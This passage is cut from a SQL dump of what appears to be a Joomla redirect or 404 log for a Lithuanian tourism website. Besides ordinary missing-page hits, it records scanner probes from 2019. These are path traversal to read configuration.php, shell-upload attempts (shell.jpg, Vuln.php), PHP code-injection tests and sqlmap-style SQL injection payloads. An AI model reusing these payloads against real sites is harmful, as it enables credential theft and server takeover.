00:00:00'),(2877,'http://infotytuvenai.lt/index.php/lt/?option=com_addproperty&task=listing&propertyId=73&action=filedownload&fname=../configuration.php','','','',102,0,'2019-03-29 16:34:55','0000-00-00 00:00:00'),(2878,'http://infotytuvenai.lt/index.php/lt/?option=com_jetext&task=download&file=../../configuration.php','','','',26,0,'2019-03-29 16:34:56','0000-00-00 00:00:00'),(2879,'http://infotytuvenai.lt/index.php/lt/?option=com_community&view=groups&groupid=33&task=app&app=groupfilesharing&do=download&file=../../../../configuration.php&Itemid=0','','','',95,0,'2019-03-29 16:34:58','0000-00-00 00:00:00'),(2880,'http://infotytuvenai.lt/index.php/lt/?option=com_download-monitor&file=configuration.php','','','',84,0,'2019-03-29 16:34:58','0000-00-00 00:00:00'),(2881,'http://www.infotytuvenai.lt/index.php/lt//language/en-GB/en-GB.xml','','','',3,0,'2019-03-31 18:30:32','0000-00-00 00:00:00'),(2882,'http://infotytuvenai.lt/index.php/lt/13-sample-data-article/demo/features/index.php/lt/?option=com_content&view=article&id=305','','','',4,0,'2019-04-01 16:22:43','0000-00-00 00:00:00'),(2883,'http://infotytuvenai.lt/index.php/lt//web/wp-includes/wlwmanifest.xml','','','',250,0,'2019-04-03 06:12:30','0000-00-00 00:00:00'),(2884,'http://infotytuvenai.lt/index.php/lt//website/wp-includes/wlwmanifest.xml','','','',250,0,'2019-04-03 06:12:31','0000-00-00 00:00:00'),(2885,'http://infotytuvenai.lt/index.php/lt//news/wp-includes/wlwmanifest.xml','','','',251,0,'2019-04-03 06:12:32','0000-00-00 00:00:00'),(2886,'http://infotytuvenai.lt/index.php/lt//2015/wp-includes/wlwmanifest.xml','','','',15,0,'2019-04-03 06:12:32','0000-00-00 00:00:00'),(2887,'http://infotytuvenai.lt/index.php/lt//2016/wp-includes/wlwmanifest.xml','','','',15,0,'2019-04-03 06:12:33','0000-00-00 00:00:00'),(2888,'http://infotytuvenai.lt/index.php/lt//2017/wp-includes/wlwmanifest.xml','','','',15,0,'2019-04-03 06:12:33','0000-00-00 00:00:00'),(2889,'http://infotytuvenai.lt/index.php/lt//2018/wp-includes/wlwmanifest.xml','','','',176,0,'2019-04-03 06:12:33','0000-00-00 00:00:00'),(2890,'http://infotytuvenai.lt/index.php/lt//shop/wp-includes/wlwmanifest.xml','','','',176,0,'2019-04-03 06:12:34','0000-00-00 00:00:00'),(2891,'http://infotytuvenai.lt/index.php/lt//wp1/wp-includes/wlwmanifest.xml','','','',251,0,'2019-04-03 06:12:34','0000-00-00 00:00:00'),(2892,'http://infotytuvenai.lt/index.php/lt//test/wp-includes/wlwmanifest.xml','','','',251,0,'2019-04-03 06:12:35','0000-00-00 00:00:00'),(2893,'http://infotytuvenai.lt/index.php/lt//media/wp-includes/wlwmanifest.xml','','','',176,0,'2019-04-03 06:12:35','0000-00-00 00:00:00'),(2894,'http://infotytuvenai.lt/index.php/lt//wp2/wp-includes/wlwmanifest.xml','','','',251,0,'2019-04-03 06:12:36','0000-00-00 00:00:00'),(2895,'http://infotytuvenai.lt/index.php/lt//sito/wp-includes/wlwmanifest.xml','','','',248,0,'2019-04-03 06:12:37','0000-00-00 00:00:00'),(2896,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article;\0&id=306','','','',1,0,'2019-04-07 02:17:24','0000-00-00 00:00:00'),(2897,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content--&view=article&id=306','','','',1,0,'2019-04-07 02:17:26','0000-00-00 00:00:00'),(2898,'http://infotytuvenai.lt/index.php/lt/index.php/lt/kontaktai','','','',3,0,'2019-04-11 04:47:59','0000-00-00 00:00:00'),(2899,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/44-paskutinesnaujienos/index.php/lt/components/com_k2/js/k2.js?v2.6.7&sitepath=/','','','',4,0,'2019-04-15 23:23:10','0000-00-00 00:00:00'),(2900,'http://infotytuvenai.lt/index.php/lt/images/kava.jpg','','http://infotytuvenai.lt/index.php/lt/','',1,0,'2019-04-17 19:02:54','0000-00-00 00:00:00'),(2901,'http://infotytuvenai.lt/index.php/lt/images/1s.png','','http://infotytuvenai.lt/index.php/lt/','',1,0,'2019-04-17 19:02:54','0000-00-00 00:00:00'),(2902,'http://infotytuvenai.lt/index.php/lt/images/stories/naujienos/dviraciu_zygis2018/main.jpg','','http://infotytuvenai.lt/index.php/lt/','',1,0,'2019-04-17 19:02:54','0000-00-00 00:00:00'),(2903,'http://infotytuvenai.lt/index.php/lt/images/amatai.jpg','','http://infotytuvenai.lt/index.php/lt/','',1,0,'2019-04-17 19:02:55','0000-00-00 00:00:00'),(2904,'http://infotytuvenai.lt/index.php/lt/images/111dfasdfsaf.jpg','','http://infotytuvenai.lt/index.php/lt/','',1,0,'2019-04-17 19:02:56','0000-00-00 00:00:00'),(2905,'http://infotytuvenai.lt/index.php/lt/images/12asadddd.jpg','','http://infotytuvenai.lt/index.php/lt/','',1,0,'2019-04-17 19:02:56','0000-00-00 00:00:00'),(2906,'http://infotytuvenai.lt/index.php/lt/images/Maitinimas.jpg','','http://infotytuvenai.lt/index.php/lt/','',1,0,'2019-04-17 19:02:55','0000-00-00 00:00:00'),(2907,'http://infotytuvenai.lt/index.php/lt/images/2.jpg','','http://infotytuvenai.lt/index.php/lt/','',1,0,'2019-04-17 19:02:56','0000-00-00 00:00:00'),(2908,'http://infotytuvenai.lt/index.php/lt/images/stories/naujienos/zygis/dviraciu_zygis.jpg','','http://infotytuvenai.lt/index.php/lt/','',1,0,'2019-04-17 19:02:56','0000-00-00 00:00:00'),(2909,'http://infotytuvenai.lt/index.php/lt/images/turizmoinformacija.jpg','','http://infotytuvenai.lt/index.php/lt/','',1,0,'2019-04-17 19:02:56','0000-00-00 00:00:00'),(2910,'http://infotytuvenai.lt/index.php/lt/images/dviratis.jpg','','http://infotytuvenai.lt/index.php/lt/','',1,0,'2019-04-17 19:02:56','0000-00-00 00:00:00'),(2911,'http://infotytuvenai.lt/index.php/lt/images/DJI_0138.JPG','','http://infotytuvenai.lt/index.php/lt/','',1,0,'2019-04-17 19:02:56','0000-00-00 00:00:00'),(2912,'http://infotytuvenai.lt/index.php/lt/images/stories/naujienos/fest18/main.jpg','','http://infotytuvenai.lt/index.php/lt/','',1,0,'2019-04-17 19:02:56','0000-00-00 00:00:00'),(2913,'http://infotytuvenai.lt/index.php/lt/images/popiezius.jpg','','http://infotytuvenai.lt/index.php/lt/','',1,0,'2019-04-17 19:02:56','0000-00-00 00:00:00'),(2914,'http://infotytuvenai.lt/index.php/lt/images/apgyvendinimas.jpg','','http://infotytuvenai.lt/index.php/lt/','',1,0,'2019-04-17 19:02:56','0000-00-00 00:00:00'),(2915,'http://infotytuvenai.lt/index.php/lt/modules/mod_gtranslate/tmpl/lang/blank.png','','http://infotytuvenai.lt/index.php/lt/','',1,0,'2019-04-17 19:02:57','0000-00-00 00:00:00'),(2916,'http://www.infotytuvenai.lt/index.php/lt/?option=com_jifile&task=filesystem.download&filename=configuration.php&lang=en','','','',1,0,'2019-05-06 03:17:55','0000-00-00 00:00:00'),(2917,'http://infotytuvenai.lt/index.php/lt/maitinimas/index.php/lt/turizmo-informacija/components/com_k2/js/k2.js?v2.6.7&sitepath=/','','','',2,0,'2019-05-07 07:56:58','0000-00-00 00:00:00'),(2918,'http://www.infotytuvenai.lt/index.php/lt/undefined/','','','',1,0,'2019-05-10 04:50:52','0000-00-00 00:00:00'),(2919,'http://infotytuvenai.lt/index.php/lt/javascript:;','','','',1,0,'2019-05-11 16:30:33','0000-00-00 00:00:00'),(2920,'http://www.infotytuvenai.lt/index.php/lt/apgyvendinimas raganyne','','','',1,0,'2019-05-16 07:33:57','0000-00-00 00:00:00'),(2921,'http://infotytuvenai.lt/index.php/lt/?option=com_content((\'.,.&view=article&id=305','','','',1,0,'2019-05-17 02:23:25','0000-00-00 00:00:00'),(2922,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content((\'.,.&view=article&id=305','','','',1,0,'2019-05-17 06:08:52','0000-00-00 00:00:00'),(2923,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/44-paskutinesnaujienos/components/com_k2/js/k2.js?v2.6.7&sitepath=/','','','',2,0,'2019-05-21 00:14:25','0000-00-00 00:00:00'),(2924,'http://infotytuvenai.lt/index.php/lt/?option=com_k2&view=item&id=1','','','',1,0,'2019-05-23 13:46:01','0000-00-00 00:00:00'),(2925,'http://infotytuvenai.lt/index.php/lt/?option=com_kunena&view=user&layout=edit','','','',2,0,'2019-06-09 06:25:32','0000-00-00 00:00:00'),(2926,'http://infotytuvenai.lt:80/index.php/lt/index.php/lt/','','http://infotytuvenai.lt/index.php/lt/','',1,0,'2019-06-14 01:08:51','0000-00-00 00:00:00'),(2927,'http://infotytuvenai.lt/index.php/lt/43-apie-centra/','','','',8,0,'2019-06-26 23:16:30','0000-00-00 00:00:00'),(2928,'http://infotytuvenai.lt/index.php/lt/41-apie-centra/','','','',8,0,'2019-06-26 23:16:45','0000-00-00 00:00:00'),(2929,'http://infotytuvenai.lt/index.php/lt/index.php/lt/?start=72','','','',2,0,'2019-07-03 02:10:39','0000-00-00 00:00:00'),(2930,'http://www.infotytuvenai.lt/index.php/lt/?option=com_user&view=login','','http://www.infotytuvenai.lt/index.php/lt/component/users?view=login','',5,0,'2019-07-23 05:56:12','0000-00-00 00:00:00'),(2931,'http://www.infotytuvenai.lt/index.php/lt/[object Array Iterator]?pb=!1m5!1m4!1i16!2i36992!3i20537!4i256!2m3!1e0!2sm!3i476184508!2m3!1e2!6m1!3e5!3m14!2sen-US!3sUS!5e18!12m1!1e68!12m3!1e37!2m1!1ssmartmaps!12m4!1e26!2m2!1sstyles!2zcC5zOi02MHxwLmw6LTYw!4e0!5m','','http://www.infotytuvenai.lt/index.php/lt/kontaktai','',1,0,'2019-07-25 18:52:35','0000-00-00 00:00:00'),(2932,'http://www.infotytuvenai.lt/index.php/lt/[object Array Iterator]?pb=!1m5!1m4!1i16!2i36992!3i20538!4i256!2m3!1e0!2sm!3i476184508!2m3!1e2!6m1!3e5!3m14!2sen-US!3sUS!5e18!12m1!1e68!12m3!1e37!2m1!1ssmartmaps!12m4!1e26!2m2!1sstyles!2zcC5zOi02MHxwLmw6LTYw!4e0!5m','','http://www.infotytuvenai.lt/index.php/lt/kontaktai','',1,0,'2019-07-25 18:52:36','0000-00-00 00:00:00'),(2933,'http://www.infotytuvenai.lt/index.php/lt/[object Array Iterator]?pb=!1m4!1m3!1i16!2i36991!3i20537!1m4!1m3!1i16!2i36991!3i20538!1m4!1m3!1i16!2i36992!3i20537!1m4!1m3!1i16!2i36992!3i20538!2m3!1e0!2sm!3i476185168!3m14!2sen-US!3sUS!5e18!12m1!1e68!12m3!1e37!2m1','','http://www.infotytuvenai.lt/index.php/lt/kontaktai','',1,0,'2019-07-25 18:52:36','0000-00-00 00:00:00'),(2934,'http://www.infotytuvenai.lt/index.php/lt/[object Array Iterator]?pb=!1m5!1m4!1i16!2i36991!3i20537!4i256!2m3!1e0!2sm!3i476185168!2m3!1e2!6m1!3e5!3m14!2sen-US!3sUS!5e18!12m1!1e68!12m3!1e37!2m1!1ssmartmaps!12m4!1e26!2m2!1sstyles!2zcC5zOi02MHxwLmw6LTYw!4e0!5m','','http://www.infotytuvenai.lt/index.php/lt/kontaktai','',1,0,'2019-07-25 18:52:36','0000-00-00 00:00:00'),(2935,'http://www.infotytuvenai.lt/index.php/lt/[object Array Iterator]?pb=!1m5!1m4!1i16!2i36991!3i20538!4i256!2m3!1e0!2sm!3i476185168!2m3!1e2!6m1!3e5!3m14!2sen-US!3sUS!5e18!12m1!1e68!12m3!1e37!2m1!1ssmartmaps!12m4!1e26!2m2!1sstyles!2zcC5zOi02MHxwLmw6LTYw!4e0!5m','','http://www.infotytuvenai.lt/index.php/lt/kontaktai','',1,0,'2019-07-25 18:52:36','0000-00-00 00:00:00'),(2936,'http://infotytuvenai.lt/index.php/tasks.php','','','',1,0,'2019-07-28 05:07:35','0000-00-00 00:00:00'),(2937,'http://infotytuvenai.lt/index.php/lt/tt0002/MOLLYSLAPTOP_W617601.B10DE07AAF4822AB78BF9FC6CB51E4D4/0/Windows 7 x64 SP1/1013/197.58.23.172/1B11ABA3CDC04496695F64E9DB6DC83C2CD8B8821DD86FCEF948BBE27F4D8158/etd1eu5qKefqptNxyiczJmPFX3xw1e/','','','',1,0,'2019-07-28 05:07:55','0000-00-00 00:00:00'),(2938,'http://www.infotytuvenai.lt/index.php/lt/administrator/index.php','','','',1,0,'2019-07-29 16:12:13','0000-00-00 00:00:00'),(2939,'http://infotytuvenai.lt/index.php/lt/forum/index','','','',1,0,'2019-07-30 17:39:21','0000-00-00 00:00:00'),(2940,'http://infotytuvenai.lt/index.php/lt//index.php/lt/?option=com_content{${print(238947899389478923-34567343546345)}}&view=article{${print(238947899389478923-34567343546345)}}&id=306{${print(238947899389478923-34567343546345)}}','','','',1,0,'2019-07-31 08:29:35','0000-00-00 00:00:00'),(2941,'http://infotytuvenai.lt/index.php/lt//index.php/lt/?option=com_content{${print(238947899389478923-34567343546345)}}&view=article{${print(238947899389478923-34567343546345)}}&id=305{${print(238947899389478923-34567343546345)}}','','','',1,0,'2019-07-31 08:29:35','0000-00-00 00:00:00'),(2942,'http://infotytuvenai.lt/index.php/lt//index.php/lt/?start=12{${print(238947899389478923-34567343546345)}}','','','',2,0,'2019-07-31 08:29:36','0000-00-00 00:00:00'),(2943,'http://infotytuvenai.lt/index.php/lt//index.php/lt/?start=24{${print(238947899389478923-34567343546345)}}','','','',1,0,'2019-07-31 08:29:36','0000-00-00 00:00:00'),(2944,'http://infotytuvenai.lt/index.php/lt//index.php/lt/?start=36{${print(238947899389478923-34567343546345)}}','','','',1,0,'2019-07-31 08:29:37','0000-00-00 00:00:00'),(2945,'http://infotytuvenai.lt/index.php/lt//index.php/lt/?start=48{${print(238947899389478923-34567343546345)}}','','','',1,0,'2019-07-31 08:29:37','0000-00-00 00:00:00'),(2946,'http://infotytuvenai.lt/index.php/lt//index.php/lt/?start=60{${print(238947899389478923-34567343546345)}}','','','',1,0,'2019-07-31 08:29:38','0000-00-00 00:00:00'),(2947,'http://infotytuvenai.lt/index.php/lt//index.php/lt/?start=72{${print(238947899389478923-34567343546345)}}','','','',1,0,'2019-07-31 08:29:38','0000-00-00 00:00:00'),(2948,'http://infotytuvenai.lt/index.php/lt//index.php/lt/?start=84{${print(238947899389478923-34567343546345)}}','','','',1,0,'2019-07-31 08:29:38','0000-00-00 00:00:00'),(2949,'http://infotytuvenai.lt/index.php/lt//index.php/lt/?start=96{${print(238947899389478923-34567343546345)}}','','','',1,0,'2019-07-31 08:29:39','0000-00-00 00:00:00'),(2950,'http://infotytuvenai.lt/index.php/lt//index.php/lt/?start=108{${print(238947899389478923-34567343546345)}}','','','',1,0,'2019-07-31 08:29:39','0000-00-00 00:00:00'),(2951,'http://infotytuvenai.lt/index.php/lt//index.php/lt/?start=132{${print(238947899389478923-34567343546345)}}','','','',1,0,'2019-07-31 08:29:40','0000-00-00 00:00:00'),(2952,'http://infotytuvenai.lt/index.php/lt//index.php/lt/?option=com_contentprint(238947899389478923-34567343546345);&view=articleprint(238947899389478923-34567343546345);&id=306print(238947899389478923-34567343546345);','','','',1,0,'2019-07-31 08:29:40','0000-00-00 00:00:00'),(2953,'http://infotytuvenai.lt/index.php/lt//index.php/lt/?option=com_contentprint(238947899389478923-34567343546345);&view=articleprint(238947899389478923-34567343546345);&id=305print(238947899389478923-34567343546345);','','','',1,0,'2019-07-31 08:29:41','0000-00-00 00:00:00'),(2954,'http://infotytuvenai.lt/index.php/lt//index.php/lt/?start=12print(238947899389478923-34567343546345);','','','',2,0,'2019-07-31 08:29:41','0000-00-00 00:00:00'),(2955,'http://infotytuvenai.lt/index.php/lt//index.php/lt/?start=24print(238947899389478923-34567343546345);','','','',1,0,'2019-07-31 08:29:42','0000-00-00 00:00:00'),(2956,'http://infotytuvenai.lt/index.php/lt//index.php/lt/?start=36print(238947899389478923-34567343546345);','','','',1,0,'2019-07-31 08:29:42','0000-00-00 00:00:00'),(2957,'http://infotytuvenai.lt/index.php/lt//index.php/lt/?start=48print(238947899389478923-34567343546345);','','','',1,0,'2019-07-31 08:29:42','0000-00-00 00:00:00'),(2958,'http://infotytuvenai.lt/index.php/lt//index.php/lt/?start=60print(238947899389478923-34567343546345);','','','',1,0,'2019-07-31 08:29:43','0000-00-00 00:00:00'),(2959,'http://infotytuvenai.lt/index.php/lt//index.php/lt/?start=72print(238947899389478923-34567343546345);','','','',1,0,'2019-07-31 08:29:43','0000-00-00 00:00:00'),(2960,'http://infotytuvenai.lt/index.php/lt//index.php/lt/?start=84print(238947899389478923-34567343546345);','','','',1,0,'2019-07-31 08:29:44','0000-00-00 00:00:00'),(2961,'http://infotytuvenai.lt/index.php/lt//index.php/lt/?start=96print(238947899389478923-34567343546345);','','','',1,0,'2019-07-31 08:29:44','0000-00-00 00:00:00'),(2962,'http://infotytuvenai.lt/index.php/lt//index.php/lt/?start=108print(238947899389478923-34567343546345);','','','',1,0,'2019-07-31 08:29:44','0000-00-00 00:00:00'),(2963,'http://infotytuvenai.lt/index.php/lt//index.php/lt/?start=132print(238947899389478923-34567343546345);','','','',1,0,'2019-07-31 08:29:45','0000-00-00 00:00:00'),(2964,'http://infotytuvenai.lt/index.php/lt//index.php/lt/?option=com_content}print(238947899389478923-34567343546345);{&view=article}print(238947899389478923-34567343546345);{&id=306}print(238947899389478923-34567343546345);{','','','',1,0,'2019-07-31 08:30:04','0000-00-00 00:00:00'),(2965,'http://infotytuvenai.lt/index.php/lt//index.php/lt/?option=com_content}print(238947899389478923-34567343546345);{&view=article}print(238947899389478923-34567343546345);{&id=305}print(238947899389478923-34567343546345);{','','','',1,0,'2019-07-31 08:30:05','0000-00-00 00:00:00'),(2966,'http://infotytuvenai.lt/index.php/lt//index.php/lt/?start=12}print(238947899389478923-34567343546345);{','','','',2,0,'2019-07-31 08:30:05','0000-00-00 00:00:00'),(2967,'http://infotytuvenai.lt/index.php/lt//index.php/lt/?start=24}print(238947899389478923-34567343546345);{','','','',1,0,'2019-07-31 08:30:05','0000-00-00 00:00:00'),(2968,'http://infotytuvenai.lt/index.php/lt//index.php/lt/?start=36}print(238947899389478923-34567343546345);{','','','',1,0,'2019-07-31 08:30:06','0000-00-00 00:00:00'),(2969,'http://infotytuvenai.lt/index.php/lt//index.php/lt/?start=48}print(238947899389478923-34567343546345);{','','','',1,0,'2019-07-31 08:30:06','0000-00-00 00:00:00'),(2970,'http://infotytuvenai.lt/index.php/lt//index.php/lt/?start=60}print(238947899389478923-34567343546345);{','','','',1,0,'2019-07-31 08:30:06','0000-00-00 00:00:00'),(2971,'http://infotytuvenai.lt/index.php/lt//index.php/lt/?start=72}print(238947899389478923-34567343546345);{','','','',1,0,'2019-07-31 08:30:07','0000-00-00 00:00:00'),(2972,'http://infotytuvenai.lt/index.php/lt//index.php/lt/?start=84}print(238947899389478923-34567343546345);{','','','',1,0,'2019-07-31 08:30:07','0000-00-00 00:00:00'),(2973,'http://infotytuvenai.lt/index.php/lt//index.php/lt/?start=96}print(238947899389478923-34567343546345);{','','','',1,0,'2019-07-31 08:30:08','0000-00-00 00:00:00'),(2974,'http://infotytuvenai.lt/index.php/lt//index.php/lt/?start=108}print(238947899389478923-34567343546345);{','','','',1,0,'2019-07-31 08:30:08','0000-00-00 00:00:00'),(2975,'http://infotytuvenai.lt/index.php/lt//index.php/lt/?start=132}print(238947899389478923-34567343546345);{','','','',1,0,'2019-07-31 08:30:09','0000-00-00 00:00:00'),(2976,'http://infotytuvenai.lt/index.php/lt/?option=com_ccboard','','','',1,0,'2019-08-06 07:54:36','0000-00-00 00:00:00'),(2977,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&layout=form','','','',4,0,'2019-08-29 13:12:21','0000-00-00 00:00:00'),(2978,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/lankytini-objektai/components/com_k2/js/k2.js?v2.6.7&sitepath=/','','','',2,0,'2019-09-05 00:10:21','0000-00-00 00:00:00'),(2979,'http://infotytuvenai.lt/index.php/lt/maitinimas/components/com_k2/js/k2.js?v2.6.7&sitepath=/','','','',2,0,'2019-09-05 15:50:11','0000-00-00 00:00:00'),(2980,'http://infotytuvenai.lt/index.php/lt/?amp;id=305&option=com_content&view=article','','','',1,0,'2019-09-06 01:41:02','0000-00-00 00:00:00'),(2981,'http://www.infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../','','','',10,0,'2019-09-12 23:10:19','0000-00-00 00:00:00'),(2982,'http://www.infotytuvenai.lt/index.php/lt/?option=com_foxcontact&view=invalid','','','',10,0,'2019-09-12 23:10:31','0000-00-00 00:00:00'),(2983,'http://www.infotytuvenai.lt/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form\"','','','',10,0,'2019-09-12 23:10:32','0000-00-00 00:00:00'),(2984,'http://www.infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../Vuln.php','','','',9,0,'2019-09-12 23:10:49','0000-00-00 00:00:00'),(2985,'http://www.infotytuvenai.lt/index.php/lt/?option=com_jwallpapers&task=upload','','','',18,0,'2019-09-12 23:11:02','0000-00-00 00:00:00'),(2986,'http://www.infotytuvenai.lt/index.php/lt/?option=com_community&view=groups&groupid=1&task=app&app=groupfilesharing&do=download&file=../../../../configuration.php&Itemid=0','','','',14,0,'2019-09-12 23:11:26','0000-00-00 00:00:00'),(2987,'http://www.infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Files/shell.jpg','','','',9,0,'2019-09-12 23:11:38','0000-00-00 00:00:00'),(2988,'http://www.infotytuvenai.lt/index.php/lt/?option=com_agora&task=upload?name=Vuln.php','','','',9,0,'2019-09-12 23:11:46','0000-00-00 00:00:00'),(2989,'http://www.infotytuvenai.lt/index.php/lt/?option=com_collector&view=filelist&tmpl=component&folder=&type=1','','','',9,0,'2019-09-12 23:11:58','0000-00-00 00:00:00'),(2990,'http://www.infotytuvenai.lt/index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en','','','',9,0,'2019-09-12 23:12:01','0000-00-00 00:00:00'),(2991,'http://www.infotytuvenai.lt/index.php/lt/?option=com_jetext&task=download&file=../../configuration.phF','','','',10,0,'2019-09-12 23:12:16','0000-00-00 00:00:00'),(2992,'http://www.infotytuvenai.lt/index.php/lt/?option=com_download-monitor&file=configuration.php','','','',12,0,'2019-09-12 23:12:22','0000-00-00 00:00:00'),(2993,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../','','','',83,0,'2019-09-12 23:13:11','0000-00-00 00:00:00'),(2994,'http://infotytuvenai.lt/index.php/lt/?option=com_foxcontact&view=invalid','','','',83,0,'2019-09-12 23:13:23','0000-00-00 00:00:00'),(2995,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../Vuln.php','','','',58,0,'2019-09-12 23:13:39','0000-00-00 00:00:00'),(2996,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Files/shell.jpg','','','',58,0,'2019-09-12 23:14:29','0000-00-00 00:00:00'),(2997,'http://infotytuvenai.lt/index.php/lt/?option=com_agora&task=upload?name=Vuln.php','','','',51,0,'2019-09-12 23:14:36','0000-00-00 00:00:00'),(2998,'http://infotytuvenai.lt/index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en','','','',60,0,'2019-09-12 23:14:51','0000-00-00 00:00:00'),(2999,'http://infotytuvenai.lt/index.php/lt/?option=com_jetext&task=download&file=../../configuration.phF','','','',74,0,'2019-09-12 23:15:06','0000-00-00 00:00:00'),(3000,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../attari.php','','','',17,0,'2019-09-13 00:10:43','0000-00-00 00:00:00'),(3001,'http://infotytuvenai.lt/index.php/lt/?option=com_user&view=reset&layout=confirm','','','',21,0,'2019-09-13 00:11:03','0000-00-00 00:00:00'),(3002,'http://infotytuvenai.lt/index.php/lt/?option=com_installer&view=archive','','','',20,0,'2019-09-13 00:11:08','0000-00-00 00:00:00'),(3003,'http://www.infotytuvenai.lt/index.php/lt/?option=3631&view=article&id=306','','','',1,0,'2019-09-30 11:29:28','0000-00-00 00:00:00'),(3004,'http://www.infotytuvenai.lt/index.php/lt/?option=1100&view=article&id=306','','','',1,0,'2019-09-30 11:31:00','0000-00-00 00:00:00'),(3005,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content\'xXESKh<\'\">Chtbfn&view=article&id=306','','','',1,0,'2019-09-30 11:31:33','0000-00-00 00:00:00'),(3006,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content) AND 5332=8621 AND (5888=5888&view=article&id=306','','','',1,0,'2019-09-30 11:31:34','0000-00-00 00:00:00'),(3007,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content) AND 5455=5455 AND (1904=1904&view=article&id=306','','','',1,0,'2019-09-30 11:32:05','0000-00-00 00:00:00'),(3008,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content AND 9803=3907&view=article&id=306','','','',1,0,'2019-09-30 11:32:06','0000-00-00 00:00:00'),(3009,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content AND 5455=5455&view=article&id=306','','','',1,0,'2019-09-30 11:32:07','0000-00-00 00:00:00'),(3010,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content\') AND 8756=7089 AND (\'bekS\'=\'bekS&view=article&id=306','','','',1,0,'2019-09-30 11:32:38','0000-00-00 00:00:00'),(3011,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content\') AND 5455=5455 AND (\'mKBC\'=\'mKBC&view=article&id=306','','','',1,0,'2019-09-30 11:33:40','0000-00-00 00:00:00'),(3012,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content\' AND 6497=8205 AND \'mWOt\'=\'mWOt&view=article&id=306','','','',1,0,'2019-09-30 11:33:41','0000-00-00 00:00:00'),(3013,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content\' AND 5455=5455 AND \'IWdr\'=\'IWdr&view=article&id=306','','','',1,0,'2019-09-30 11:33:42','0000-00-00 00:00:00'),(3014,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content%\' AND 5507=9196 AND \'%\'=\'&view=article&id=306','','','',1,0,'2019-09-30 11:33:43','0000-00-00 00:00:00'),(3015,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content AND 9952=7805-- GHJl&view=article&id=306','','','',1,0,'2019-09-30 11:36:45','0000-00-00 00:00:00'),(3016,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content AND 5455=5455-- QPFH&view=article&id=306','','','',1,0,'2019-09-30 11:36:46','0000-00-00 00:00:00'),(3017,'http://www.infotytuvenai.lt/index.php/lt/?option=(SELECT (CASE WHEN (3756=3223) THEN 3756 ELSE 3756*(SELECT 3756 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&view=article&id=306','','','',1,0,'2019-09-30 11:37:17','0000-00-00 00:00:00'),(3018,'http://www.infotytuvenai.lt/index.php/lt/?option=(SELECT (CASE WHEN (4000=4000) THEN 4000 ELSE 4000*(SELECT 4000 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&view=article&id=306','','','',1,0,'2019-09-30 11:38:18','0000-00-00 00:00:00'),(3019,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content\') AND (SELECT 5921 FROM(SELECT COUNT(*),CONCAT(0x7178786b71,(SELECT (ELT(5921=5921,1))),0x7176716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (\'Xrgr\'=\'Xrgr&vie','','','',1,0,'2019-09-30 11:42:20','0000-00-00 00:00:00'),(3020,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content%\' AND (SELECT 5921 FROM(SELECT COUNT(*),CONCAT(0x7178786b71,(SELECT (ELT(5921=5921,1))),0x7176716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND \'%\'=\'&view=articl','','','',1,0,'2019-09-30 11:44:21','0000-00-00 00:00:00'),(3021,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content AND (SELECT 5921 FROM(SELECT COUNT(*),CONCAT(0x7178786b71,(SELECT (ELT(5921=5921,1))),0x7176716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- fBat&view=article&id=','','','',1,0,'2019-09-30 11:44:52','0000-00-00 00:00:00'),(3022,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content) AND 9761=CAST((CHR(113)||CHR(120)||CHR(120)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (9761=9761) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(113)||CHR(107)||CHR(113)) AS NUMERIC) AND (3','','','',1,0,'2019-09-30 11:44:53','0000-00-00 00:00:00'),(3023,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content AND 9761=CAST((CHR(113)||CHR(120)||CHR(120)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (9761=9761) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(113)||CHR(107)||CHR(113)) AS NUMERIC)&view=ar','','','',1,0,'2019-09-30 11:44:54','0000-00-00 